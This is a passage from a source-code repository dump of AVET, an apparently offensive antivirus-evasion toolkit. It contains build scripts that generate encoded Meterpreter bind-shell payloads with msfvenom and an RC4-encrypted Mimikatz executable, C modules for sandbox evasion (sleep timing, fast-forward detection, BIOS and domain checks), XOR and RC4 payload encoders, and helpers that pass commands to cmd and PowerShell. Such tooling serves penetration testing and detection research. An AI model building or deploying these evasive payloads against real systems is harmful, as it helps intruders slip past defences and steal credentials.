./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 66 | # compile to exe file 67 | $win64_compiler -o output/timedfibonacci_rc4_mimikatz.exe source/avet.c 68 | strip output/timedfibonacci_rc4_mimikatz.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | 74 | echo " 75 | # The decryption key is aabbccdd1122 if it has not been changed. 76 | # You need to provide the decryption key as 2nd command line argument. 77 | # Call generated executable on target like: 78 | # $ timedfibo_rc4_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 79 | " 80 | -------------------------------------------------------------------------------- /build/buildsvc_20xshikata_bindtcp_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Designed for use with msf psexec module! 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | # no command preexec 28 | set_command_source no_data 29 | set_command_exec no_command 30 | # generate key file 31 | generate_key preset aabbcc12de input/key_raw.txt 32 | #CONFIGURATION_END 33 | 34 | 35 | # make meterpreter bind payload, encoded 20 rounds with shikata_ga_nai 36 | msfvenom -p windows/meterpreter/bind_tcp lport=$LPORT -e x86/shikata_ga_nai -i 20 -f raw -a x86 --platform Windows > input/sc_raw.txt 37 | 38 | # add evasion techniques 39 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 40 | add_evasion gethostbyname_sandbox_evasion 'this.that' 41 | 42 | # encode shellcode 43 | encode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt 44 | 45 | # array name buf is expected by static_from_file retrieval method 46 | ./tools/data_raw_to_c/data_raw_to_c input/scenc_raw.txt input/scenc_c.txt buf 47 | 48 | # set shellcode source 49 | set_payload_source static_from_file input/scenc_c.txt 50 | 51 | # convert generated key from raw to C into array "key" 52 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 53 | 54 | # set key source 55 | set_key_source static_from_file input/key_c.txt 56 | 57 | # set payload info source 58 | set_payload_info_source no_data 59 | 60 | # set decoder 61 | set_decoder xor 62 | 63 | # set shellcode binding technique 64 | set_payload_execution_method exec_shellcode 65 | 66 | # enable debug printing 67 | enable_debug_print to_file C:/avetdbg.txt 68 | 69 | # compile 70 | $win32_compiler -o output/svc_20xshikata_bindtcp_win32.exe source/avetsvc.c -lws2_32 71 | strip output/svc_20xshikata_bindtcp_win32.exe 72 | 73 | # cleanup 74 | cleanup_techniques 75 | 76 | echo " 77 | # Execute the following command: 78 | # $ svc_20xshikata_bindtcp_win32.exe 79 | " 80 | 81 | -------------------------------------------------------------------------------- /build/global_connect_config.sh: -------------------------------------------------------------------------------- 1 | # definition of default lhost/lport values for all build scripts 2 | # change to your desired default values here, if necessary 3 | GLOBAL_LHOST=192.168.56.101 4 | GLOBAL_LPORT=443 5 | -------------------------------------------------------------------------------- /build/global_win32.sh: -------------------------------------------------------------------------------- 1 | win32_compiler="i686-w64-mingw32-gcc" 2 | win32cpp_compiler="i686-w64-mingw32-g++" 3 | # win32_compiler="wine gcc -m32" 4 | -------------------------------------------------------------------------------- /build/global_win64.sh: -------------------------------------------------------------------------------- 1 | win64_compiler="x86_64-w64-mingw32-gcc" 2 | win64cpp_compiler="x86_64-w64-mingw32-g++" 3 | # win64_compiler="wine gcc -m64" 4 | -------------------------------------------------------------------------------- /build_script_tester.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import os 4 | import glob 5 | import subprocess 6 | import re 7 | 8 | # get list of build scripts and create directory named testing 9 | build_scripts = glob.glob('./build/build*.sh') 10 | count = len(build_scripts) 11 | 12 | if not os.path.isdir("./testing"): 13 | os.mkdir("./testing") 14 | 15 | 16 | # Create File. If it exists already, it will be cleared 17 | open("./testing/result.txt", 'w').close() 18 | 19 | 20 | # prepare for summary 21 | failed = "Build Scripts with errors:\n" 22 | 23 | 24 | # run all build scripts and save output in buffer 25 | buffer = [] 26 | current = 1 27 | for script in build_scripts: 28 | print("\n[%d/%d]\t--Testing %s--" % (current, count, script[8:])) 29 | process = subprocess.run( 30 | [script], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) 31 | output = process.stdout.decode("utf-8") 32 | 33 | buffer.append("--Testing %s--\n%s" % (script[8:], output)) 34 | 35 | current_script = script[14:-3] 36 | 37 | # test for errors while building 38 | # Search for keywords in stdout and stderr 39 | keywords = ["cannot find", "fault", "unable", "error", "Error", 40 | "Unable", "No such file or directory", "warning", "undeclared"] 41 | if any(x in output for x in keywords): 42 | failed += "%s:\n" % current_script 43 | for item in keywords: 44 | finding = re.search(".*"+item+".*", output) 45 | if bool(finding): 46 | print(finding.group()) 47 | failed += "\t%s:\n" % finding.group() 48 | 49 | # test if .exe is generated 50 | if os.path.isfile("./output/%s.exe" % current_script): 51 | print("%s executable could be created\n" % current_script) 52 | else: 53 | print("%s executable could NOT be created\n" % current_script) 54 | failed += "\t%s executable could NOT be created\n" % current_script 55 | current += 1 56 | 57 | 58 | # print summary 59 | summary = "---------------------------Summary---------------------------\n" 60 | summary += failed 61 | 62 | print(summary) 63 | 64 | 65 | # write buffer in file result.txt 66 | buffer.append(summary) 67 | with open("./testing/result.txt", 'w') as result: 68 | result.writelines(buffer) 69 | -------------------------------------------------------------------------------- /images/pm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/images/pm.png -------------------------------------------------------------------------------- /input/dummy.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/input/dummy.txt -------------------------------------------------------------------------------- /input/goodware_samples/put_goodware_here.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/input/goodware_samples/put_goodware_here.txt -------------------------------------------------------------------------------- /output/dummy.txt: -------------------------------------------------------------------------------- 1 | dummy 2 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | autopep8==2.0.0 2 | certifi==2022.9.24 3 | charset-normalizer==2.1.1 4 | contourpy==1.0.6 5 | cycler==0.11.0 6 | fonttools==4.38.0 7 | idna==3.4 8 | joblib==1.2.0 9 | kiwisolver==1.4.4 10 | lief==0.12.2 11 | matplotlib==3.0.3 12 | mpmath==1.2.1 13 | networkx==3.0rc1 14 | numpy==1.23.4 15 | nvidia-cublas-cu11==11.10.3.66 16 | nvidia-cuda-nvrtc-cu11==11.7.99 17 | nvidia-cuda-runtime-cu11==11.7.99 18 | nvidia-cudnn-cu11==8.5.0.96 19 | packaging==21.3 20 | Pillow==9.3.0 21 | pycodestyle==2.9.1 22 | pyparsing==3.0.9 23 | python-dateutil==2.8.2 24 | python-magic==0.4.27 25 | requests==2.28.1 26 | scikit-learn==1.1.3 27 | scipy==1.9.3 28 | secml==0.13.post1 29 | six==1.16.0 30 | sympy==1.11.1 31 | threadpoolctl==3.1.0 32 | tomli==2.0.1 33 | torch==1.14.0.dev20221115+cu117 34 | torchaudio==0.14.0.dev20221115+cu117 35 | torchvision==0.15.0.dev20221115+cu117 36 | typing_extensions==4.4.0 37 | urllib3==1.26.12 38 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # This is a setup script to get AVET ready to use on a 64-bit Kali system. 3 | # You still have to "next" through the tdm-gcc installer GUI, though. 4 | 5 | echo "+++ Preparing AVET for use..." 6 | 7 | echo "+++ Installing wine and wine32" 8 | # add missing sources for wine32 9 | sudo dpkg --add-architecture i386 10 | sudo apt update 11 | sudo apt install wine -y 12 | sudo apt install wine32 -y 13 | 14 | # Install mingw crosscompiler 15 | sudo apt install mingw-w64 -y 16 | sudo apt install jq -y 17 | 18 | echo "+++ Downloading and installing tdm-gcc via wine" 19 | wget https://github.com/jmeubank/tdm-gcc/releases/download/v9.2.0-tdm64-1/tdm64-gcc-9.2.0.exe 20 | wine tdm64-gcc-9.2.0.exe 21 | rm tdm64-gcc-9.2.0.exe 22 | 23 | 24 | while true; do 25 | read -p "Do you want to download the dependencies AVET needs? [y/n]" yn 26 | case $yn in 27 | [Yy]* ) # Install dependencies 28 | echo "+++ Downloading Mimikatz" 29 | curl -s https://api.github.com/repos/gentilkiwi/mimikatz/releases/latest \ 30 | | jq -r '.assets[].browser_download_url' \ 31 | | grep .'zip' \ 32 | | wget -i - 33 | unzip -j mimikatz_trunk.zip x64/mimikatz.exe -d input/ 34 | rm mimikatz_trunk.zip 35 | 36 | echo "+++ Downloading pe2shc" 37 | mkdir ../pe_to_shellcode 38 | curl -s https://api.github.com/repos/hasherezade/pe_to_shellcode/releases/latest \ 39 | | jq -r '.assets[].browser_download_url' \ 40 | | grep 'pe2shc' \ 41 | | wget -i - 42 | mv pe2shc.exe ../pe_to_shellcode 43 | 44 | echo "+++ Cloning DKMC" 45 | git clone https://github.com/Mr-Un1k0d3r/DKMC.git 46 | mv DKMC/ ../ ; break;; 47 | [Nn]* ) 48 | echo "Dependencies not installed!" 49 | break;; 50 | * ) echo "Please answer yes or no.";; 51 | esac 52 | done 53 | 54 | echo "+++ Finished setup procedure!" 55 | -------------------------------------------------------------------------------- /source/command_exec/command_exec.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/command_exec/command_exec.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/debug_print/debug_print.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/decode_payload/decode_payload.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/decode_payload/decode_payload.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/evasion/evasion.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/evasion/evasion.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_command/get_command.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_command/get_command.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_key/get_key.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_key/get_key.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_payload/get_payload.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_payload/get_payload.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_payload_info/get_payload_info.assign: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/get_payload_info/get_payload_info.include: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /source/implementations/command_exec/exec_via_cmd.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "../debug_print/debug_print.h" 5 | 6 | 7 | // Starts cmd.exe and executes the command speficied. 8 | void exec_via_cmd(const char *command, int command_size) { 9 | DEBUG_PRINT("exec_via_cmd called.\n"); 10 | DEBUG_PRINT("Passing command %s to cmd.exe\n", command); 11 | system(command); 12 | } 13 | -------------------------------------------------------------------------------- /source/implementations/command_exec/exec_via_powershell.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // Starts powershell.exe and executes the command specified. 9 | void exec_via_powershell(const char *command, int command_size) { 10 | DEBUG_PRINT("exec_via_powershell called.\n"); 11 | 12 | char *powershell_call = "powershell.exe "; 13 | char *system_arg = (char *) malloc(strlen(powershell_call) + command_size + 1); 14 | strcpy(system_arg, powershell_call); 15 | strcat(system_arg, command); 16 | 17 | DEBUG_PRINT("Passing argument %s to cmd.exe\n", system_arg); 18 | 19 | system(system_arg); 20 | } 21 | -------------------------------------------------------------------------------- /source/implementations/command_exec/no_command.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "../debug_print/debug_print.h" 4 | 5 | 6 | // Dummy function to handle cases where no command is executed. 7 | // In that case, both arguments command and command_size are ignored. 8 | void no_command(const char *command, int command_size) { 9 | DEBUG_PRINT("\"no_command\" command_exec function called.\n"); 10 | } 11 | -------------------------------------------------------------------------------- /source/implementations/debug_print/debug_print.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | 4 | // Defines the DEBUG_PRINT macro. 5 | // DEBUG_PRINT writes to stdout by default, or into a logfile instead if the DEBUG_TO_FILE define is set. 6 | // Use DEBUG_PRINT like printf: DEBUG_PRINT("My string: %s\n", my_string); 7 | 8 | 9 | #ifdef DEBUG 10 | #include 11 | 12 | #ifdef DEBUG_TO_FILE 13 | #include 14 | 15 | // Definition of LOGFILE should be enforced by enable_debug_output. 16 | // Check anyways in case something went wrong. 17 | #ifndef LOGFILE 18 | #define LOGFILE "C:\\users\\public\\avetdbg.txt" 19 | #endif 20 | 21 | // Debug output is written to file instead when DEBUG_TO_FILE is set (as in avetsvc) 22 | int DEBUG_PRINT(char *format, ...) { 23 | va_list args; 24 | va_start(args, format); 25 | 26 | FILE *logfile; 27 | logfile = fopen(LOGFILE, "a+"); 28 | if(logfile == NULL) { 29 | return -1; 30 | } 31 | vfprintf(logfile, format, args); 32 | fclose(logfile); 33 | 34 | va_end(args); 35 | 36 | return 0; 37 | } 38 | #else 39 | // Debug output via printf 40 | #define DEBUG_PRINT(...) printf(__VA_ARGS__) 41 | #endif 42 | #else 43 | // Substitute function call with 0 expression, so that debug strings are purged from the executable 44 | #define DEBUG_PRINT(...) 0 45 | #endif 46 | -------------------------------------------------------------------------------- /source/implementations/encoding/avet/avet_decoder.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../../debug_print/debug_print.h" 5 | 6 | 7 | // return pointer to payload 8 | unsigned char* avet_decoder(const unsigned char *buffer, unsigned char *payload, int size) 9 | { 10 | DEBUG_PRINT("This is AVET decoder.\n"); 11 | int j=0; 12 | payload=malloc((size/2)); 13 | 14 | DEBUG_PRINT("decode_payload, size for malloc: %d\nPayload output:\n", size/2); 15 | 16 | int i=0; 17 | do 18 | { 19 | unsigned char temp[3]={0}; 20 | sprintf((char*)temp,"%c%c",buffer[i],buffer[i+1]); 21 | payload[j] = strtoul(temp, NULL, 16); 22 | 23 | DEBUG_PRINT("%x",payload[j]); 24 | 25 | i+=2; 26 | j++; 27 | } while(i $2 6 | 7 | -------------------------------------------------------------------------------- /source/implementations/encoding/avet/sh_format: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/encoding/avet/sh_format -------------------------------------------------------------------------------- /source/implementations/encoding/none/none_decoder.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "../../debug_print/debug_print.h" 5 | 6 | 7 | // Dummy function to handle options where no encoding/decoding is applied at all 8 | void decode_none(const unsigned char *ciphertext, const int ciphertext_length, const unsigned char *key, const int key_length, unsigned char *plaintext) { 9 | DEBUG_PRINT("decode_none function called \n"); 10 | memcpy(plaintext, ciphertext, ciphertext_length); 11 | } 12 | -------------------------------------------------------------------------------- /source/implementations/encoding/rc4/rc4.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | const int N = 256; // 2^8 4 | 5 | 6 | void swap(unsigned char *a, unsigned char *b) { 7 | int tmp = *a; 8 | *a = *b; 9 | *b = tmp; 10 | } 11 | 12 | 13 | int KSA(const unsigned char *key, unsigned char *S, const int key_length) { 14 | int j = 0; 15 | 16 | for(int i = 0; i < N; i++) 17 | S[i] = i; 18 | 19 | for(int i = 0; i < N; i++) { 20 | j = (j + S[i] + key[i % key_length]) % N; 21 | 22 | swap(&S[i], &S[j]); 23 | } 24 | 25 | return 0; 26 | } 27 | 28 | 29 | int PRGA(unsigned char *S, const unsigned char *plaintext, unsigned char *ciphertext, const int plaintext_length) { 30 | int i = 0; 31 | int j = 0; 32 | 33 | for(int n = 0; n < plaintext_length; n++) { 34 | i = (i + 1) % N; 35 | j = (j + S[i]) % N; 36 | 37 | swap(&S[i], &S[j]); 38 | int rnd = S[(S[i] + S[j]) % N]; 39 | 40 | ciphertext[n] = rnd ^ plaintext[n]; 41 | 42 | } 43 | 44 | return 0; 45 | } 46 | 47 | 48 | // RC4 encryption routine. 49 | // Encrypts the given plaintext with the supplied key, and stores the result in ciphertext. 50 | // Supports variable key length, within reason. 51 | void RC4(const unsigned char *plaintext, const int plaintext_length, const unsigned char *key, const int key_length, unsigned char *ciphertext) { 52 | unsigned char S[N]; 53 | KSA(key, S, key_length); 54 | PRGA(S, plaintext, ciphertext, plaintext_length); 55 | } 56 | -------------------------------------------------------------------------------- /source/implementations/encoding/rc4/rc4_decoder.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "../../debug_print/debug_print.h" 4 | #include "rc4.h" 5 | 6 | 7 | // RC4-decrypts the ciphertext with the key and stores the result in plaintext. 8 | // To do this, the RC4 function is applied reverse to encryption, with the ciphertext posing as the plain text, and vice versa. 9 | void decode_rc4(const unsigned char *ciphertext, const int ciphertext_length, const unsigned char *key, const int key_length, unsigned char *plaintext) { 10 | DEBUG_PRINT("This is RC4 decoder.\n"); 11 | // Function signature: 12 | // void RC4(const unsigned char *plaintext, const int plaintext_length, const unsigned char *key, const int key_length, unsigned char *ciphertext) 13 | RC4(ciphertext, ciphertext_length, key, key_length, plaintext); 14 | } 15 | -------------------------------------------------------------------------------- /source/implementations/encoding/rc4/rc4_encoder: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/encoding/rc4/rc4_encoder -------------------------------------------------------------------------------- /source/implementations/encoding/rc4/rc4_encoder.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "../../../data_utility.h" 4 | #include "rc4.h" 5 | 6 | 7 | // Arguments expected: 8 | // argv[1]: Name of the file containing the payload to be encoded (raw format expected) 9 | // argv[2]: Name of the file where the encoded payload shall be written to 10 | // argv[3]: Name of the file the key to be applied is stored (raw format) 11 | int main(int argc, char **argv) { 12 | int payload_size; 13 | int key_length; 14 | 15 | printf("Starting RC4 encoder...\n"); 16 | 17 | // Read payload from file into memory 18 | printf("Reading payload from file %s, expecting raw format.\n", argv[1]); 19 | unsigned char *payload = data_from_file_raw(argv[1], &payload_size); 20 | printf("payload size in bytes is %d\n", payload_size); 21 | 22 | // Read encryption key from file into memory 23 | printf("Reading key from file %s, expecting raw format.\n", argv[3]); 24 | unsigned char *key = data_from_file_raw(argv[3], &key_length); 25 | printf("Key length in bytes is %d\n", key_length); 26 | 27 | // Encrypt and write ciphertext to file 28 | unsigned char *ciphertext = (unsigned char *) malloc(payload_size); 29 | printf("Applying RC4 algorithm\n"); 30 | RC4(payload, payload_size, key, key_length, ciphertext); 31 | printf("Writing payload to file %s\n", argv[2]); 32 | data_to_file_raw(ciphertext, payload_size, argv[2]); 33 | 34 | return 0; 35 | } 36 | -------------------------------------------------------------------------------- /source/implementations/encoding/xor/xor_decoder.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "../../debug_print/debug_print.h" 4 | 5 | 6 | // XORs the ciphertext with the key and stores the result in plaintext. 7 | // The key bytes are applied succesively. The ciphertext_length is not required to be a multiple of the key_length. 8 | void decode_xor(const unsigned char *ciphertext, const int ciphertext_length, const unsigned char *key, const int key_length, unsigned char *plaintext) { 9 | DEBUG_PRINT("This is XOR decoder.\n"); 10 | for(int i = 0; i < ciphertext_length; i++) { 11 | plaintext[i] = ciphertext[i] ^ key[i % key_length]; 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /source/implementations/encoding/xor/xor_encoder: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/source/implementations/encoding/xor/xor_encoder -------------------------------------------------------------------------------- /source/implementations/encoding/xor/xor_encoder.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "../../../data_utility.h" 4 | 5 | 6 | // XORs the plaintext with key bytes and stores the result in ciphertext. 7 | // Can handle multi-byte keys, key bytes are then applied successively. 8 | // Plaintext length is not required to be a multiple of the key length, the procedure just stops when the plaintext ends. 9 | void xor_encode(const unsigned char *plaintext, const int plaintext_length, const unsigned char *key, const int key_length, unsigned char *ciphertext) { 10 | for(int i = 0; i < plaintext_length; i++) { 11 | ciphertext[i] = plaintext[i] ^ key[i % key_length]; 12 | } 13 | } 14 | 15 | 16 | // Arguments expected: 17 | // argv[1]: Name of the file containing the payload to be encoded (raw format expected) 18 | // argv[2]: Name of the file where the encoded payload shall be written to 19 | // argv[3]: Name of the file the key to be applied is stored (raw format) 20 | int main(int argc, char **argv) { 21 | int payload_size; 22 | int key_length; 23 | 24 | printf("Starting XOR encoder...\n"); 25 | 26 | // Read payload from file into memory 27 | printf("Reading payload from file %s, expecting raw format.\n", argv[1]); 28 | unsigned char *payload = data_from_file_raw(argv[1], &payload_size); 29 | printf("payload size in bytes is %d\n", payload_size); 30 | 31 | // Read encryption key from file into memory 32 | printf("Reading key from file %s, expecting raw format.\n", argv[3]); 33 | unsigned char *key = data_from_file_raw(argv[3], &key_length); 34 | printf("Key length in bytes is %d\n", key_length); 35 | 36 | // Encrypt and write ciphertext to file 37 | unsigned char *ciphertext = (unsigned char *) malloc(payload_size); 38 | printf("Applying XOR algorithm\n"); 39 | xor_encode(payload, payload_size, key, key_length, ciphertext); 40 | printf("Writing payload to file %s\n", argv[2]); 41 | data_to_file_raw(ciphertext, payload_size, argv[2]); 42 | 43 | return 0; 44 | } 45 | -------------------------------------------------------------------------------- /source/implementations/evasion/check_fast_forwarding.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "../debug_print/debug_print.h" 9 | 10 | u_int64 Delta(const SYSTEMTIME st1, const SYSTEMTIME st2) { 11 | union timeunion 12 | { 13 | FILETIME fileTime; 14 | ULARGE_INTEGER ul; 15 | }; 16 | 17 | FILETIME ft1; 18 | FILETIME ft2; 19 | 20 | SystemTimeToFileTime(&st1, &ft1); 21 | SystemTimeToFileTime(&st2, &ft2); 22 | 23 | ULARGE_INTEGER u1 = {0}; 24 | ULARGE_INTEGER u2 = {0}; 25 | 26 | memcpy(&u1, &ft1, sizeof(u1)); 27 | memcpy(&u2, &ft2, sizeof(u2)); 28 | 29 | return u2.QuadPart - u1.QuadPart; 30 | } 31 | 32 | // Check if sandbox utilize fast forwarding to reduce heuristic check time 33 | // 34 | // Get time before and after sleep and calculate the difference 35 | // If the difference and specified sleep time match, we proceed 36 | // arg1: time in Seconds 37 | void check_fast_forwarding(char *arg1) { 38 | DEBUG_PRINT("Applying check_fast_forwarding technique.\n"); 39 | 40 | SYSTEMTIME before_sleep; 41 | SYSTEMTIME after_sleep; 42 | 43 | GetLocalTime(&before_sleep); 44 | 45 | DEBUG_PRINT("Time before sleep: %d:%d:%d", before_sleep.wHour, before_sleep.wMinute, before_sleep.wSecond); 46 | DEBUG_PRINT("Sleeping for %s Seconds...\n", arg1); 47 | 48 | int time = atoi(arg1); 49 | Sleep(time * 1000); 50 | 51 | GetLocalTime(&after_sleep); 52 | 53 | u_int64 i = Delta(before_sleep, after_sleep); 54 | 55 | DEBUG_PRINT("Time difference %s Seconds...\n", i/10000000); 56 | 57 | if (time == i) { 58 | DEBUG_PRINT("Proceed!\n"); 59 | } else { 60 | exit(0); 61 | } 62 | } 63 | -------------------------------------------------------------------------------- /source/implementations/evasion/computation_fibonacci.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "../debug_print/debug_print.h" 5 | 6 | 7 | // Compute arg1 iterations of the Fibonacci series. 8 | // (Will likely produce false results for greater n due to modulo reduction inside integer boundaries) 9 | // 10 | // arg1: Number of iterations to compute 11 | void computation_fibonacci(char *arg1) { 12 | int n = atoi(arg1); 13 | DEBUG_PRINT("Computing the %sth number of the fibonacci series...\n", arg1); 14 | 15 | unsigned int a = 0; 16 | unsigned int b = 1; 17 | unsigned int c = 0; 18 | 19 | int i = 2; 20 | while (i < n) { 21 | c = a + b; 22 | a = b; 23 | b = c; 24 | i++; 25 | } 26 | 27 | // Ensure that the computed value is used at the end of the data flow to avoid dead code. 28 | printf("Number is %u.", c); 29 | } 30 | -------------------------------------------------------------------------------- /source/implementations/evasion/computation_timed_fibonacci.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // Computes iterations of the Fibonacci series. Stops computations after approximately arg1 seconds. 9 | // (Will likely produce false results for greater n due to modulo reduction inside integer boundaries) 10 | // 11 | // arg1: Number of seconds to run the computation 12 | void computation_timed_fibonacci(char *arg1) { 13 | int time = atoi(arg1); 14 | DEBUG_PRINT("Computing elements of the Fibonacci series for %s seconds...\n", arg1); 15 | 16 | unsigned int a = 0; 17 | unsigned int b = 1; 18 | unsigned int c = 0; 19 | 20 | clock_t start = clock(); 21 | clock_t end; 22 | float elapsed_seconds = 0.0; 23 | 24 | unsigned int i = 2; 25 | while(1) { 26 | // Check elapsed time every 100 iterations 27 | if (i%100 == 0) { 28 | end = clock(); 29 | elapsed_seconds = (float)(end - start) / CLOCKS_PER_SEC; 30 | if(elapsed_seconds > ((float) time)) { 31 | break; 32 | } 33 | } 34 | 35 | c = a + b; 36 | a = b; 37 | b = c; 38 | i++; 39 | } 40 | 41 | // Ensure that the computed value is required at the end of the data flow. 42 | printf("Final number is %u.", c); 43 | } 44 | -------------------------------------------------------------------------------- /source/implementations/evasion/evasion_by_sleep.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Sleep for a specified time 10 | // 11 | // arg1: time in Seconds 12 | void evasion_by_sleep(char *arg1) { 13 | DEBUG_PRINT("Applying evasion_by_sleep technique.\n"); 14 | DEBUG_PRINT("Sleeping for %s Seconds...\n", arg1); 15 | 16 | int time = atoi(arg1); 17 | Sleep(time * 1000); 18 | DEBUG_PRINT("Proceed!\n"); 19 | } 20 | -------------------------------------------------------------------------------- /source/implementations/evasion/fopen_sandbox_evasion.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "../debug_print/debug_print.h" 6 | 7 | 8 | // Checks if a given file exists on the system. If opening fails, the program exits. 9 | // 10 | // arg1: Specifies the file to check upon. 11 | void fopen_sandbox_evasion(char *arg1) { 12 | DEBUG_PRINT("Applying fopen sandbox evasion technique.\n"); 13 | DEBUG_PRINT("Checking for file %s...\n", arg1); 14 | 15 | FILE *fp = fopen(arg1, "rb"); 16 | 17 | if (fp == NULL) { 18 | exit(0); 19 | } 20 | 21 | fclose(fp); 22 | } 23 | -------------------------------------------------------------------------------- /source/implementations/evasion/get_bios_info.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | struct RawSMBIOSData 9 | { 10 | BYTE Used20CallingMethod; 11 | BYTE SMBIOSMajorVersion; 12 | BYTE SMBIOSMinorVersion; 13 | BYTE DmiRevision; 14 | DWORD Length; 15 | BYTE SMBIOSTableData[]; 16 | }; 17 | 18 | // Checks if it is possible to fetch SMBIOS firmware table 19 | // 20 | // Proceed if possible, else exit. 21 | void get_bios_info(char *arg1) { 22 | DWORD smBiosDataSize = 0; 23 | struct RawSMBIOSData *smBiosData = NULL; 24 | DWORD bytesWritten = 0; 25 | 26 | DEBUG_PRINT("Applying get_bios_info evasion technique.\n"); 27 | DEBUG_PRINT("Exiting if unable to fetch bios info\n"); 28 | 29 | // Query size of SMBIOS data. 30 | smBiosDataSize = GetSystemFirmwareTable('RSMB', 0, NULL, 0); 31 | 32 | smBiosData = (struct RawSMBIOSData*) HeapAlloc(GetProcessHeap(), 0, smBiosDataSize); 33 | if (!smBiosData) { 34 | DEBUG_PRINT("Out of memory\n"); 35 | } 36 | 37 | // Retrieve the SMBIOS table 38 | bytesWritten = GetSystemFirmwareTable('RSMB', 0, smBiosData, smBiosDataSize); 39 | 40 | if (bytesWritten == smBiosDataSize) { 41 | DEBUG_PRINT("Proceed!\n"); 42 | } else { 43 | exit(0); 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /source/implementations/evasion/get_computer_domain.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include "../debug_print/debug_print.h" 7 | 8 | 9 | // Queries the DNS domain the target is in. 10 | // If the target is not in the expected domain as specified in arg1, the program exits. 11 | // 12 | // arg1: 